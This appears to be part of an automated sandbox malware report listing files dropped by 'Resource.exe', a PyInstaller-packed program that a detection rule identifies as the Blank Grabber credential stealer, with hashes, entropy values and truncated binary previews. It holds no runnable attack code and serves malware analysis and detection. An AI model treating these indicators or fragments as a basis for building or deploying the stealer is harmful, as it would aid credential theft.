Entropy (8bit):	7.8135914033786475
Encrypted:	false
SSDEEP:	1536:65xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:yxdYKS/Y5RJRIVCVJvXpy
MD5:	20A7ECFE1E59721E53AEBEB441A05932
SHA1:	A91C81B0394D32470E9BEFF43B4FAA4AACD42573
SHA-256:	7EBBE24DA78B652A1B6FE77B955507B1DAFF6AF7FF7E5C3FA5AC71190BDE3DA8
SHA-512:	99E5D877D34EBAAAEB281C86AF3FFF9D54333BD0617F1366E3B4822D33E23586EF9B11F4F7DD7E1E4A314C7A881F33123735294FE8AF3A136CD10F80A9B8D902
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ruhsat_Bilgisi__.bat, Detection: malicious, Browse Filename: mei.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d......e.........." ...#............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59672
Entropy (8bit):	7.82957734909026
Encrypted:	false
SSDEEP:	1536:aMUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:aBOLL0FnIXm/yk6IVLPZpo
MD5:	5006B7EA33FCE9F7800FECC4EB837A41
SHA1:	F6366BA281B2F46E9E84506029A6BDF7948E60EB
SHA-256:	8F7A5B0ABC319BA9BFD11581F002E533FCBE4CA96CEDD37656B579CD3942EF81
SHA-512:	E3E5E8F471A8CA0D5F0091E00056BD53C27105A946CA936DA3F5897B9D802167149710404386C2ED3399B237B8DA24B1A24E2561C436ED2E031A8F0564FBBC7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................).....).....).....).....O...............W.......c.O.....O.....O.o...O.....Rich..........................PE..d......e.........." ...#.........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109336
Entropy (8bit):	7.933037133644081
Encrypted:	false
SSDEEP:	1536:9Ot51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:AzanBZkGlmRc1en8R/iIVOqHC0r
MD5:	D0231F126902DB68D7F6CA1652B222C0
SHA1:	70E79674D0084C106E246474C4FB112E9C5578EB
SHA-256:	69876F825678B717C51B7E7E480DE19499D972CB1E98BBFD307E53EE5BACE351
SHA-512:	B6B6BFD5FDE200A9F45AEB7F6F845EAC916FEEEF2E3FCA54E4652E1F19D66AE9817F1625CE0ED79D62E504377011CE23FD95A407FBDBAA6911A09E48B5EF4179
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d......e.........." ...#.p...................................................0............`..........................................,..P....)....... ..........$'...........-..........................................@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.654026577022311
Encrypted:	false
SSDEEP:	768:V35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:R5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
MD5:	A81E0DF35DED42E8909597F64865E2B3
SHA1:	6B1D3A3CD48E94F752DD354791848707676CA84D
SHA-256:	5582F82F7656D4D92ED22F8E460BEBD722E04C8F993C3A6ADCC8437264981185
SHA-512:	2CDA7348FAFFABC826FB7C4EDDC120675730077540F042D6DC8F5E6921CF2B9CB88AFCD114F53290AA20DF832E3B7A767432EA292F6E5B5B5B7D0E05CF8905A6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.91494851779059
Encrypted:	false
SSDEEP:	1536:0xMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:ATJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
MD5:	F8B61629E42ADFE417CB39CDBDF832BB
SHA1:	E7F59134B2BF387A5FD5FAA6D36393CBCBD24F61
SHA-256:	7A3973FEDD5D4F60887CF0665BCB7BD3C648AD40D3AE7A8E249D875395E5E320
SHA-512:	58D2882A05289B9D17949884BF50C8F4480A6E6D2B8BD48DFDBCB03D5009AF64ABF7E9967357AEEBF95575D7EF434A40E8AD07A2C1FE275D1A87AA59DCC702D6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.484232189428478
Encrypted:	false
SSDEEP:	768:PtihFuym2pDjIVQU8v5YiSyvyxAMxkE44:sXmqjIVQU8B7Sy+xE4
MD5:	0DA22CCB73CD146FCDF3C61EF279B921
SHA1:	333547F05E351A1378DAFA46F4B7C10CBEBE3554
SHA-256:	E8AE2C5D37A68BD34054678AE092E2878F73A0F41E6787210F1E9B9BB97F37A0
SHA-512:	9EECE79511163EB7C36A937F3F2F83703195FC752B63400552CA03D0D78078875FF41116EBAEB05C48E58E82B01254A328572096A17AAAD818D32F3D2D07F436
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44312
Entropy (8bit):	7.717509871918743
Encrypted:	false
SSDEEP:	768:woQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:woTIzwF/JbqIVLwJFY7SyLxU
MD5:	C12BDED48873B3098C7A36EB06B34870
SHA1:	C32A57BC2FC8031417632500AA9B1C01C3866ADE
SHA-256:	6C4860CB071BB6D0B899F7CA2A1DA796B06EA391BAC99A01F192E856725E88AA
SHA-512:	335510D6F2F13FB2476A5A17445CA6820C86F7A8A8650F4FD855DD098D022A16C80A8131E04212FD724957D8785AD51CCAFF532F2532224CCFD6CE44F4E740F9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57624
Entropy (8bit):	7.832914003064299
Encrypted:	false
SSDEEP:	1536:Nw9DUaMjfQ0G17k3Gq+m3SvZ6XhH60CSLMIVOQZu7Sypx/:ezMjYfwPzR60qIVOQZuB
MD5:	63618D0BC7B07AECC487A76EB3A94AF8
SHA1:	53D528EF2ECBE8817D10C7DF53AE798D0981943A
SHA-256:	E74C9CA9007B6B43FF46783ECB393E6EC9EBBDF03F7C12A90C996D9331700A8B
SHA-512:	8280F0F6AFC69A82BC34E16637003AFB61FEE5D8F2CAB80BE7D66525623EC33F1449B0CC8C96DF363C661BD9DBC7918A787ECAFAAA5D2B85E6CAFDCF0432D394
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.g...g...g.......g.......g.....g.......g.......g.......g..q....g.......g...g...f..q....g..q....g..q..g..q....g..Rich.g..........................PE..d......e.........." ...#.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	66840
Entropy (8bit):	7.864649468753277
Encrypted:	false
SSDEEP:	1536:HbCYwNqce1LbV8uQvTLwNsDgzg+JR15xzf5/5JrwIVC7y3S7Syykx0:HuYwNABQQxzhRTxTx5JcIVC7yCa
MD5:	E52DBAEBA8CD6CADF00FEA19DF63F0C1
SHA1:	C03F112EE2035D0EAAB184AE5F9DB89ACA04273A
SHA-256:	EAF60A9E979C95669D8F209F751725DF385944F347142E0ECDCF2F794D005EAD
SHA-512:	10EEF8FD49E2997542E809C4436AD35DCC6B8A4B9B4313AD54481DAEF5F01296C9C5F6DEDAD93FB620F267AEF46B0208DEFFBAD1903593FD26FD717A030E89E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1440734
Entropy (8bit):	5.590383253842785
Encrypted:	false
SSDEEP:	24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
MD5:	D220B7E359810266FE6885A169448FA0
SHA1:	556728B326318B992B0DEF059ECA239EB14BA198
SHA-256:	CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
SHA-512:	8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	116958
Entropy (8bit):	7.664460077540289
Encrypted:	false
SSDEEP:	3072:PEVq52IIFfqwtVgrbE6wxdwc3zrvCJNU6R:mq52I0fqoKrw6gdwvU6R
MD5:	F2CC0C763BA120C2C1420682CDAA7A99
SHA1:	2B077F7C760AD047247AAD1E18B2F8E3C420BB67
SHA-256:	E188238654636DC8727A82A72A09E1299F3FB4A3E0E2FE527ABCD6F5AA6CD163
SHA-512:	DBF5CFC35FB8FFC9F7DEEE90C764B77B1628AB376FE2ADE05F688799BD3507A62379ADD66D20A5E38C75B9959564115B22351907EE2B8E2A4AE8B3C0ABF68A99
Malicious:	false
Preview:	PK........Q.(X..b.h...h.......stub-o.pyc.........4.e..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1629464
Entropy (8bit):	7.952620301087112
Encrypted:	false
SSDEEP:	49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5:	27515B5BB912701ABB4DFAD186B1DA1F
SHA1:	3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256:	FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512:	087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.930038440560372
Encrypted:	false
SSDEEP:	3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:	6EDA5A055B164E5E798429DCD94F5B88
SHA1:	2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:	377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:	74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1705240
Entropy (8bit):	7.993600008484676
Encrypted:	true
SSDEEP:	24576:qJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:FjZiEN8p6ivZUHe2BgcpP7uaor6
MD5:	0B66C50E563D74188A1E96D6617261E8
SHA1:	CFD778B3794B4938E584078CBFAC0747A8916D9E
SHA-256:	02C665F77DB6B255FC62F978AEDBE2092B7EF1926836290DA68FD838DBF2A9F2
SHA-512:	37D710CB5C0CEB5957D11B61684CFBC65951C1D40AB560F3F3CB8FECA42F9D43BD981A0FF44C3CB7562779264F18116723457E79E0E23852D7638B1A954A258F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..qN.qN.qN.$.O.qN.$...qN.$.K.qN.$.J.qN.$.M.qN....qN...O.qN.qO..pN.B.C.]qN.B.N.qN.B...qN.B.L.qN.Rich.qN.........PE..d......e.........." ...#..........D...]...D...................................^...........`.........................................H.].......].......].......V../..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.44233047444268
Encrypted:	false
SSDEEP:	384:oUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:ojW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
MD5:	1E9E36E61651C3AD3E91ABA117EDC8D1
SHA1:	61AB19F15E692704139DB2D7FB3AC00C461F9F8B
SHA-256:	5A91BA7EA3CF48033A85247FC3B1083F497BC060778DCF537CA382A337190093
SHA-512:	B367E00E1A8A3E7AF42D997B59E180DFCA7E31622558398C398F594D619B91CEDC4879BFDDA303D37F31DFCC3447FAA88F65FD13BAC109889CEE8C1E3C1D62D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q\|'.q\|'.q\|'...'.q\|'q.}&.q\|'q.y&.q\|'q.x&.q\|'q..&.q\|'..}&.q\|'.q}'.q\|'..}&.q\|'..q&.q\|'..\|&.q\|'...'.q\|'..~&.q\|'Rich.q\|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637720
Entropy (8bit):	7.993300822314004
Encrypted:	true
SSDEEP:	12288:NevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:N8oy8x4Rl1dRnxeDlZxsl2MsDVr2
MD5:	C78FAB9114164AC981902C44D3CD9B37
SHA1:	CB34DFF3CF82160731C7DA5527C9F3E7E7F113B7
SHA-256:	4569ACFA25DDA192BECDA0D79F4254CE548A718B566792D73C43931306CC5242
SHA-512:	BF82CCC02248BE669FE4E28D8342B726CF52C4EC2BFE2EC1F71661528E2D8DF03781AE5CCF005A6022D59A90E36CEA7D3C7A495BD11BF149319C891C00AC669B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\Resource.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302872
Entropy (8bit):	7.986782854548308
Encrypted:	false
SSDEEP:	6144:Kk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:KkUfQJbUV2MhCwEQc5Np9zQ6
MD5:	AF87B4AA3862A59D74FF91BE300EE9E3
SHA1:	E5BFD29F92C28AFA79A02DC97A26ED47E4F199B4
SHA-256:	FAC71C7622957FE0773214C7432364D7FC39C5E12250FF9EAAEEA4D897564DC7
SHA-512:	1FB0B8100DFFD18C433C4AA97A4F2DA76FF6E62E2EF2139EDC4F98603BA0BB1C27B310B187B5070CF4E892FFC2D09661A6914DEFA4509C99B60BCBB50F70F4A0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00f44zdq.4mt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pi14f05.wpd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
